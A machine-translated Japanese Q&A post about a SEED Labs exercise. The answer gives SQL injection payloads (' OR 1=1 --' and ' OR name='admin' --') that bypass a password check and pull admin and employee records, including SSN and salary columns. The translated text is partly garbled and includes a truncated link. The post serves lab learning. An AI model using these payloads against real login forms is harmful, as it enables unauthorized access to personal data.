シードラボでSQLインジェクションを行う方法

Question

SQLプログラミングは比較的新しいので、私たちのラボでは、次のコードに基づいてウェブサイトの従業員IDフィールドに文を挿入するように求められています。 1 = 1 name = "admin"と入力するだけですが、これはうまくいかないようです。

Answer 1

ここでSQLを挿入する方法の1つは、userIdに常に当てはまる条件を挿入し、パスワードを処理する条件をコメントアウトすることです。

例えば、次の点を考慮してください

$input_eid = "1' OR 1=1 --"; 
$input_pwd = "does not matter"; 

これは、次のSQL生成する必要があります：あなたが見ることができるように、このクエリは関係なく、データベース内のすべての行を明確に返します

SELECT id, name, eid, salary, birth, ssn, 
phonenumber, address, email, nickname, Password 
FROM credential 
WHERE eid= '1' OR 1=1 -- and password='does not matter' 

をあなたが注射しているパスワード。

EDIT：
以下のコメントでの要件の明確化を1として、あなたは管理者の詳細を取得するname='admin'と「OR 1 = 1」の部分を置き換えることができます。有効なIDではないものから始めるようにしてください。誤ってその詳細を取得しないようにしてください。例えば、次の点を考慮してください

$input_eid = " ' OR name='admin' --"; 
$input_pwd = "does not matter"; 

あなたが管理者の詳細を照会します以下のSQL、取得したい：https://www.youtube.com/watch：私は見てお勧めします

SELECT id, name, eid, salary, birth, ssn, 
phonenumber, address, email, nickname, Password 
FROM credential 
WHERE eid= ' ' OR name='admin' --' and password='does not matter'